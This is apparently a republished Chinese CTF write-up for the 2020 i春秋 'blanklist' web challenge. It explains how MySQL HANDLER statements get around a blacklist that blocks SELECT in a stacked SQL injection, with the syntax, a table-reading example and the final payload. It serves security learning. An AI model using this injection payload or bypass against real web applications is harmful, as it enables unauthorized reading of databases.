[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入handler绕过)

Posted 笑花大王

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入handler绕过)相关的知识,希望对你有一定的参考价值。

简介

今天参加i春秋新春抗疫赛 一道web没整出来 啊啊啊 好垃圾啊啊啊啊啊啊啊  晚上看群里赵师傅的buuoj平台太屌了分分钟上线 然后赵师傅还分享了思路用handler语句绕过select过滤。。。。

原题复现:

 考察知识点:SQL注入漏洞-堆叠注入、注入绕过

 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题

简介

 基础思路参考:https://www.cnblogs.com/xhds/p/12269987.html

与上述例子不同的地方就是黑名单过滤 过滤了我的知识范围之内所有能用的  各种绕过都不行 赛后才看大佬们分享用handler handler 卧槽我都没听过 啊啊啊啊啊好垃圾!垃圾!

handler语句代替select查询

mysql除可使用select查询表中的数据,也可使用handler语句,这条语句使我们能够一行一行的浏览一个表中的数据,不过handler语句并不具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中。

 语法结构:

HANDLER tbl_name OPEN [ [AS] alias]

HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]

HANDLER tbl_name CLOSE

如:通过handler语句查询users表的内容

handler users open as yunensec; #指定数据表进行载入并将返回句柄重命名
handler yunensec read first; #读取指定表/句柄的首行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
handler yunensec read next; #读取指定表/句柄的下一行数据
...
handler yunensec close; #关闭句柄

 引用:https://xz.aliyun.com/t/7169#toc-47

 这道题的最终payload:

1\';handler FlagHere open;handler FlagHere read first;#

 

 

以上是关于[原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入handler绕过)的主要内容,如果未能解决你的问题,请参考以下文章

[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)

[原题复现]强网杯 2019 WEB高明的黑客

春秋云境 CVE-2022-24663复现

安全-Wordpress 小于等于4.6.1版本任意代码执行漏洞复现(i春秋)

安全-emlog 小于等于5.1.2版本 博客系统后台权限提升漏洞复现(i春秋)

安全-ImageMagick 小于等于6.9.3-9版本 命令执行漏洞复现(i春秋)